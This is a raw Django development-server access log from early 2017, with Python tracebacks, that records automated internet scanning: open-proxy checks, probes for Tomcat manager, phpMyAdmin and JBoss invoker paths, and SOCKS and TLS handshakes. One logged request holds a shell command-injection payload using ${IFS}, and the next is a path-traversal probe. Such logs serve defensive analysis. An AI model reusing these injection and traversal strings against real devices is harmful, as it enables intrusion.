[24/Jan/2017 02:50:40] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[24/Jan/2017 08:28:33] "GET http://www.ip.cn/?rands=_892859846215811381994152 HTTP/1.0" 404 1668
[24/Jan/2017 08:28:33] "GET http://m.sogou.com/?rands=_883221495621157621672720 HTTP/1.0" 404 1676
[24/Jan/2017 08:28:37] "GET http://www.baidu.com/?rands=_13160247680282003950504 HTTP/1.0" 404 1683
[24/Jan/2017 09:12:03] "GET / HTTP/1.1" 404 2000
[24/Jan/2017 09:15:39] "GET /script HTTP/1.1" 404 2023
[24/Jan/2017 09:49:13] "GET http://www.baidu.com/?rands=_63499587401820223916383816 HTTP/1.0" 404 1686
[24/Jan/2017 09:49:13] "GET http://23.251.55.38/index.html?rands=_2283550742102562419164 HTTP/1.0" 404 1708
[24/Jan/2017 12:00:10] "GET / HTTP/1.1" 404 2003
[24/Jan/2017 12:49:38] "GET / HTTP/1.1" 404 2005
[24/Jan/2017 12:49:39] "GET / HTTP/1.1" 404 2005
[24/Jan/2017 13:45:37] "GET /manager/html HTTP/1.1" 404 2041
[24/Jan/2017 13:58:13] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[24/Jan/2017 15:48:34] "GET /manager/html HTTP/1.1" 404 2041
[24/Jan/2017 16:03:28] "GET / HTTP/1.0" 404 2001
[24/Jan/2017 17:17:54] "GET /script HTTP/1.1" 404 2023
[24/Jan/2017 18:43:22] "GET http://www.baidu.com/?rands=_1411814128027377517860848 HTTP/1.0" 404 1685
[24/Jan/2017 18:43:25] "GET http://23.251.55.38/index.html?rands=_2165410098044103004035328 HTTP/1.0" 404 1711
[24/Jan/2017 19:31:15] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[24/Jan/2017 20:04:38] "GET / HTTP/1.0" 404 2005
[24/Jan/2017 22:03:08] "GET /manager/html HTTP/1.1" 404 2041
[24/Jan/2017 22:42:19] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[25/Jan/2017 00:34:01] "GET /manager/html HTTP/1.1" 404 2041
[25/Jan/2017 03:37:50] "GET http://www.baidu.com/?rands=_410969508211178723506160 HTTP/1.0" 404 1684
[25/Jan/2017 03:37:51] "GET http://23.251.55.38/index.html?rands=_14912128924419997104775148 HTTP/1.0" 404 1712
[25/Jan/2017 03:47:17] "GET /manager/html HTTP/1.1" 404 2041
[25/Jan/2017 05:49:45] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 2058
[25/Jan/2017 08:02:59] "GET /hndUnblock.cgi HTTP/1.0" 404 2042
[25/Jan/2017 08:03:00] "GET /tmUnblock.cgi HTTP/1.0" 404 2039
[25/Jan/2017 08:47:57] "GET /manager/html HTTP/1.1" 404 2041
[25/Jan/2017 12:33:42] "GET http://www.baidu.com/?rands=_175687629164290305766660 HTTP/1.0" 404 1684
[25/Jan/2017 12:33:43] "GET http://23.251.55.38/index.html?rands=_763014594327599603585504 HTTP/1.0" 404 1710
[25/Jan/2017 13:03:04] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[25/Jan/2017 15:24:22] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[25/Jan/2017 15:24:23] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[25/Jan/2017 16:40:04] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[25/Jan/2017 17:35:41] "HEAD http://180.163.113.82/check_proxy HTTP/1.1" 404 0
[25/Jan/2017 18:59:11] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[25/Jan/2017 20:24:39] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[25/Jan/2017 21:06:09] "GET http://www.qq.com/404/search_children.js HTTP/1.1" 404 1706
[25/Jan/2017 21:06:14] code 400, message Bad request syntax ('\x04\x01\x00PpTi4\x00')
[25/Jan/2017 21:06:14] " PpTi4 " 400 -
[25/Jan/2017 21:06:14] code 400, message Bad request syntax ('\x05\x01\x00')
[25/Jan/2017 21:06:14] " " 400 -
[25/Jan/2017 21:31:29] "GET http://www.baidu.com/?rands=_2376913050606471962509488 HTTP/1.0" 404 1685
[25/Jan/2017 21:31:30] "GET http://23.251.55.38/index.html?rands=_483639744222512603310164 HTTP/1.0" 404 1710
[25/Jan/2017 23:35:54] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[25/Jan/2017 23:44:29] "GET /manager/html HTTP/1.1" 404 2041
[26/Jan/2017 00:35:42] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[26/Jan/2017 01:17:07] code 400, message Bad request syntax ('\x04\x01\x00P\xb4\xa3qR\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb4 in position 5: ordinal not in range(128)
[26/Jan/2017 01:21:03] "GET / HTTP/1.0" 404 2001
[26/Jan/2017 01:21:03] "GET / HTTP/1.0" 404 2001
[26/Jan/2017 01:21:03] "GET / HTTP/1.1" 404 2000
[26/Jan/2017 01:21:04] "HEAD / HTTP/1.1" 404 0
[26/Jan/2017 01:21:04] "GET / HTTP/1.1" 404 2005
[26/Jan/2017 01:48:15] code 400, message Bad request syntax ('\x05\x02\x00\x02')
[26/Jan/2017 01:48:15] " " 400 -
[26/Jan/2017 02:56:51] "GET /manager/html HTTP/1.1" 404 2041
[26/Jan/2017 05:31:48] "GET /manager/html HTTP/1.1" 404 2041
[26/Jan/2017 06:25:15] "GET http://www.baidu.com/?rands=_220402837401110879470232 HTTP/1.0" 404 1684
[26/Jan/2017 06:25:16] "GET http://23.251.55.38/index.html?rands=_4845896458625531819288 HTTP/1.0" 404 1708
[26/Jan/2017 07:54:28] "GET / HTTP/1.1" 404 2000
[26/Jan/2017 09:56:11] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[26/Jan/2017 12:08:54] "GET http://www.ip.cn/?rands=_4352868363678003653784 HTTP/1.0" 404 1666
[26/Jan/2017 12:08:55] "GET http://m.sogou.com/?rands=_6030344032425731684436 HTTP/1.0" 404 1674
[26/Jan/2017 12:08:55] "GET http://www.baidu.com/?rands=_1088812864014788982876940 HTTP/1.0" 404 1685
[26/Jan/2017 12:19:30] "GET /robots.txt HTTP/1.1" 404 2036
[26/Jan/2017 12:19:34] "GET / HTTP/1.1" 404 2006
[26/Jan/2017 13:08:23] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[26/Jan/2017 13:43:01] "GET /robots.txt HTTP/1.1" 404 2040
[26/Jan/2017 13:43:05] "GET / HTTP/1.1" 404 2010
[26/Jan/2017 15:23:19] "GET http://www.baidu.com/?rands=_14854110154024810305278704 HTTP/1.0" 404 1686
[26/Jan/2017 15:23:20] "GET http://23.251.55.38/index.html?rands=_1920748013724165042016 HTTP/1.0" 404 1708
[26/Jan/2017 16:06:48] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[26/Jan/2017 19:21:28] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[26/Jan/2017 21:56:16] "GET / HTTP/1.1" 404 2000
[26/Jan/2017 22:18:03] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[27/Jan/2017 00:20:39] "GET /manager/html HTTP/1.1" 404 2041
[27/Jan/2017 00:28:43] "GET / HTTP/1.1" 404 2000
[27/Jan/2017 07:03:23] "GET /manager/html HTTP/1.1" 404 2041
[27/Jan/2017 07:13:18] "GET /manager/html HTTP/1.1" 404 2041
[27/Jan/2017 10:12:04] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[27/Jan/2017 10:25:02] "GET /upload/ HTTP/1.1" 404 2016
[27/Jan/2017 11:07:38] "POST / HTTP/1.1" 404 2006
[27/Jan/2017 14:44:07] "GET /manager/html HTTP/1.1" 404 2041
[27/Jan/2017 16:39:53] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[27/Jan/2017 17:43:02] "GET / HTTP/1.1" 404 2005
[27/Jan/2017 17:43:46] "GET http://www.baidu.com/?rands=_7973132350415311524193864 HTTP/1.0" 404 1685
[27/Jan/2017 17:43:46] "GET http://23.251.55.38/index.html?rands=_13866700240257490944580 HTTP/1.0" 404 1709
[27/Jan/2017 17:50:26] "GET /index.php HTTP/1.1" 404 2032
[27/Jan/2017 18:46:21] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[27/Jan/2017 19:15:36] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[27/Jan/2017 19:15:36] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[27/Jan/2017 21:44:28] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[27/Jan/2017 21:51:47] "GET /manager/html HTTP/1.1" 404 2041
[27/Jan/2017 23:16:01] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[27/Jan/2017 23:34:16] "GET /cgi/common.cgi HTTP/1.0" 404 2042
[27/Jan/2017 23:34:17] "GET /stssys.htm HTTP/1.0" 404 2030
[27/Jan/2017 23:34:17] "GET / HTTP/1.0" 404 2000
[27/Jan/2017 23:34:18] "POST /command.php HTTP/1.0" 404 2034
[27/Jan/2017 23:34:19] "GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0" 404 2263
[27/Jan/2017 23:34:20] "GET /../../../../../../../mnt/mtd/qt HTTP/1.0" 404 2093
[28/Jan/2017 02:28:20] "GET http://www.baidu.com/?rands=_1982462056848176705759568 HTTP/1.0" 404 1685
[28/Jan/2017 02:28:21] "GET http://23.251.55.38/index.html?rands=_4146126408022807205327012 HTTP/1.0" 404 1711
[28/Jan/2017 02:31:41] "GET /robots.txt HTTP/1.1" 404 2036
[28/Jan/2017 02:31:45] "GET / HTTP/1.1" 404 2006
[28/Jan/2017 02:52:05] "GET /robots.txt HTTP/1.1" 404 2040
[28/Jan/2017 02:52:09] "GET / HTTP/1.1" 404 2010
[28/Jan/2017 04:53:29] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[28/Jan/2017 07:35:55] "GET /index.php HTTP/1.1" 404 2032
[28/Jan/2017 08:04:26] "GET http://www.ip.cn/?rands=_189635252827535444333064 HTTP/1.0" 404 1668
[28/Jan/2017 08:04:26] "GET http://m.sogou.com/?rands=_38762422501081082524740 HTTP/1.0" 404 1675
[28/Jan/2017 08:04:26] "GET http://www.baidu.com/?rands=_5025301028407221626352 HTTP/1.0" 404 1682
[28/Jan/2017 09:00:39] "GET / HTTP/1.1" 404 2003
[28/Jan/2017 10:31:47] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[28/Jan/2017 11:15:10] "GET http://www.baidu.com/?rands=_22460229780810123684501284 HTTP/1.0" 404 1686
[28/Jan/2017 11:15:11] "GET http://23.251.55.38/index.html?rands=_4100131974439205506840240 HTTP/1.0" 404 1711
[28/Jan/2017 12:35:49] "GET /manager/html HTTP/1.1" 404 2041
[28/Jan/2017 14:26:44] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[28/Jan/2017 15:59:42] "GET /manager/html HTTP/1.1" 404 2041
[28/Jan/2017 17:24:05] "GET /script HTTP/1.1" 404 2023
[28/Jan/2017 17:32:02] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[28/Jan/2017 18:00:57] "GET / HTTP/1.1" 404 2000
[28/Jan/2017 19:34:44] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[28/Jan/2017 19:34:44] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[28/Jan/2017 19:34:46] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[28/Jan/2017 19:34:46] "GET http://www.123cha.com HTTP/1.1" 404 1653
[28/Jan/2017 20:01:14] "GET / HTTP/1.0" 404 2001
[28/Jan/2017 20:09:54] "GET http://www.baidu.com/?rands=_1638204210819025281208496 HTTP/1.0" 404 1685
[28/Jan/2017 20:09:54] "GET http://23.251.55.38/index.html?rands=_99849004788346786226159940 HTTP/1.0" 404 1712
[28/Jan/2017 22:11:12] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[28/Jan/2017 22:22:13] "GET / HTTP/1.1" 404 2000
[29/Jan/2017 01:51:33] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[29/Jan/2017 05:01:13] "GET http://www.baidu.com/?rands=_628099730840184106607356 HTTP/1.0" 404 1684
[29/Jan/2017 05:01:14] "GET http://23.251.55.38/index.html?rands=_1457456165025249323747344 HTTP/1.0" 404 1711
[29/Jan/2017 09:46:50] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[29/Jan/2017 10:10:49] "GET /script HTTP/1.1" 404 2023
[29/Jan/2017 11:18:25] "GET http://1212.ip138.com/ic.asp HTTP/1.1" 404 1674
[29/Jan/2017 11:18:26] "CONNECT 119.254.102.37:8080 HTTP/1.0" 404 1652
[29/Jan/2017 12:13:07] "GET / HTTP/1.1" 404 2004
[29/Jan/2017 13:28:48] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[29/Jan/2017 14:10:11] "GET http://www.baidu.com/?rands=_148264278241251066640929616 HTTP/1.0" 404 1687
[29/Jan/2017 14:10:11] "GET http://23.251.55.38/index.html?rands=_291625040410587843748248 HTTP/1.0" 404 1710
[29/Jan/2017 14:43:36] "GET / HTTP/1.1" 404 2005
[29/Jan/2017 16:20:31] "GET http://www.server110.com/ HTTP/1.1" 404 1668
[29/Jan/2017 16:20:31] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[29/Jan/2017 16:20:31] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[29/Jan/2017 16:20:31] "CONNECT www.linode.com:443 HTTP/1.1" 404 1652
[29/Jan/2017 19:13:02] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[29/Jan/2017 19:46:55] "GET / HTTP/1.0" 404 2001
[29/Jan/2017 20:33:47] "GET /robots.txt HTTP/1.1" 404 2036
[29/Jan/2017 20:33:53] "GET / HTTP/1.1" 404 2006
[29/Jan/2017 21:00:23] "GET /script HTTP/1.1" 404 2023
[29/Jan/2017 21:18:54] "GET /phpmyadmin HTTP/1.1" 404 2035
[29/Jan/2017 22:29:32] "GET /robots.txt HTTP/1.1" 404 2040
[29/Jan/2017 22:29:36] "GET / HTTP/1.1" 404 2010
[29/Jan/2017 23:00:03] "GET /script HTTP/1.1" 404 2023
[29/Jan/2017 23:25:14] "GET http://www.baidu.com/?rands=_62154834623290127340884 HTTP/1.0" 404 1683
[29/Jan/2017 23:25:15] "GET http://23.251.55.38/index.html?rands=_15726100306828501115221104 HTTP/1.0" 404 1712
[30/Jan/2017 01:06:08] "GET /manager/html HTTP/1.1" 404 2041
[30/Jan/2017 01:10:17] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[30/Jan/2017 01:18:30] "GET /manager/html HTTP/1.1" 404 2041
[30/Jan/2017 03:55:30] "GET / HTTP/1.1" 404 2000
[30/Jan/2017 04:21:59] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[30/Jan/2017 08:27:45] "GET http://www.baidu.com/?rands=_2985342048231554715309360 HTTP/1.0" 404 1685
[30/Jan/2017 08:27:46] "GET http://23.251.55.38/index.html?rands=_884512613219682941626416 HTTP/1.0" 404 1710
[30/Jan/2017 09:22:13] "GET / HTTP/1.1" 404 2003
[30/Jan/2017 10:29:39] "GET / HTTP/1.1" 404 2005
[30/Jan/2017 11:16:56] "GET /manager/html HTTP/1.1" 404 2041
[30/Jan/2017 11:55:07] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[30/Jan/2017 12:32:46] "GET /manager/html HTTP/1.1" 404 2041
[30/Jan/2017 15:36:49] "GET /manager/html HTTP/1.1" 404 2041
[30/Jan/2017 16:26:49] "GET / HTTP/1.1" 404 2000
[30/Jan/2017 17:34:16] "GET http://www.baidu.com/?rands=_77627492021309332417184 HTTP/1.0" 404 1683
[30/Jan/2017 17:34:17] "GET http://23.251.55.38/index.html?rands=_8895976807058882606780 HTTP/1.0" 404 1708
[30/Jan/2017 19:33:15] "GET / HTTP/1.1" 404 2004
[30/Jan/2017 20:32:01] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[30/Jan/2017 21:05:45] "GET /index.php HTTP/1.1" 404 2032
[30/Jan/2017 21:33:58] "GET /recordings/ HTTP/1.1" 404 2038
[30/Jan/2017 21:33:59] code 400, message Bad request syntax ('\x16\x03\x01\x00\x8c\x01\x00\x00\x88\x03\x034\xb3\xc1C\xd4\xfe\x8f?f\xf9IU4Lfo\xb5\xa2\x9bi`\xe9\x93I\xf9\xc5\xa6\x97\xb2\xbd\xfd\xe5\x00\x00.\xc0+\xc0/\x00\x9e\x00\x9c\xc0')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x8c in position 5: ordinal not in range(128)
[30/Jan/2017 23:04:57] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[31/Jan/2017 00:05:16] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[31/Jan/2017 00:05:16] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[31/Jan/2017 02:39:40] "GET http://www.baidu.com/?rands=_1236216838162321464881312 HTTP/1.0" 404 1685
[31/Jan/2017 02:39:40] "GET http://23.251.55.38/index.html?rands=_1985956475031276472561312 HTTP/1.0" 404 1711
[31/Jan/2017 05:31:56] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[31/Jan/2017 05:48:52] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[31/Jan/2017 06:24:15] "GET /robots.txt HTTP/1.1" 404 2036
[31/Jan/2017 06:24:19] "GET / HTTP/1.1" 404 2006
[31/Jan/2017 09:28:11] "GET /axis2/ HTTP/1.1" 404 2023
[31/Jan/2017 11:43:45] "GET http://www.baidu.com/?rands=_2036395596837763554345128 HTTP/1.0" 404 1685
[31/Jan/2017 11:43:46] "GET http://23.251.55.38/index.html?rands=_796812083283311532812872 HTTP/1.0" 404 1710
[31/Jan/2017 12:43:05] "GET / HTTP/1.1" 404 2004
[31/Jan/2017 13:19:12] "GET /robots.txt HTTP/1.1" 404 2040
[31/Jan/2017 13:19:17] "GET / HTTP/1.1" 404 2010
[31/Jan/2017 13:22:54] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[31/Jan/2017 14:44:16] "GET /recordings/index.php HTTP/1.1" 404 2065
[31/Jan/2017 18:13:13] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[31/Jan/2017 19:18:48] "GET /manager/html HTTP/1.1" 404 2041
[31/Jan/2017 20:51:38] "GET http://www.baidu.com/?rands=_23528187435217110268516308 HTTP/1.0" 404 1686
[31/Jan/2017 20:51:39] "GET http://23.251.55.38/index.html?rands=_373567975033630122587776 HTTP/1.0" 404 1710
[31/Jan/2017 21:35:06] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[31/Jan/2017 22:18:34] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[01/Feb/2017 01:18:32] "GET http://www.ip.cn/?rands=_1643456178213397401665972 HTTP/1.0" 404 1669
[01/Feb/2017 01:18:32] "GET http://m.sogou.com/?rands=_188826634401792308799544 HTTP/1.0" 404 1676
[01/Feb/2017 01:18:32] "GET http://www.baidu.com/?rands=_94029752814987703136560 HTTP/1.0" 404 1683
[01/Feb/2017 05:20:52] "GET / HTTP/1.1" 404 2005
[01/Feb/2017 05:30:34] "GET /robots.txt HTTP/1.1" 404 2040
[01/Feb/2017 05:30:37] "GET / HTTP/1.1" 404 2010
[01/Feb/2017 06:01:12] "GET http://23.251.55.38/index.html?rands=_642011062182719800631664 HTTP/1.0" 404 1710
[01/Feb/2017 08:01:09] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[01/Feb/2017 08:09:52] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[01/Feb/2017 09:50:29] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[01/Feb/2017 11:55:47] "GET / HTTP/1.0" 404 2005
[01/Feb/2017 13:18:42] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[01/Feb/2017 13:30:23] "HEAD / HTTP/1.1" 404 0
[01/Feb/2017 13:30:23] "GET / HTTP/1.1" 404 2005
[01/Feb/2017 13:30:24] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 0
[01/Feb/2017 15:14:12] "GET http://www.baidu.com/?rands=_106809597443987005061168 HTTP/1.0" 404 1684
[01/Feb/2017 15:14:16] "GET http://23.251.55.38/index.html?rands=_286606419823993126209408 HTTP/1.0" 404 1710
[01/Feb/2017 16:44:31] "GET / HTTP/1.1" 404 2000
[01/Feb/2017 17:44:29] "HEAD http://180.163.113.82/check_proxy HTTP/1.1" 404 0
[01/Feb/2017 21:03:15] "GET http://www.qq.com/404/search_children.js HTTP/1.1" 404 1706
[01/Feb/2017 21:03:20] code 400, message Bad request syntax ('\x04\x01\x00PpTi4\x00')
[01/Feb/2017 21:03:20] " PpTi4 " 400 -
[01/Feb/2017 21:03:20] code 400, message Bad request syntax ('\x05\x01\x00')
[01/Feb/2017 21:03:20] " " 400 -
[01/Feb/2017 22:22:09] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[02/Feb/2017 00:02:31] "GET http://www.ip.cn/?rands=_58143391501474203134160 HTTP/1.0" 404 1667
[02/Feb/2017 00:02:31] "GET http://m.sogou.com/?rands=_5712785106403322545088 HTTP/1.0" 404 1674
[02/Feb/2017 00:02:31] "GET http://www.baidu.com/?rands=_8166750409134371790096 HTTP/1.0" 404 1682
[02/Feb/2017 00:24:04] "GET http://www.baidu.com/?rands=_6232163980023711407393732 HTTP/1.0" 404 1685
[02/Feb/2017 00:24:05] "GET http://23.251.55.38/index.html?rands=_1129543106612184922509408 HTTP/1.0" 404 1711
[02/Feb/2017 01:30:13] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[02/Feb/2017 01:32:17] code 400, message Bad request syntax ('\x04\x01\x00P\xb4\xa3qR\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
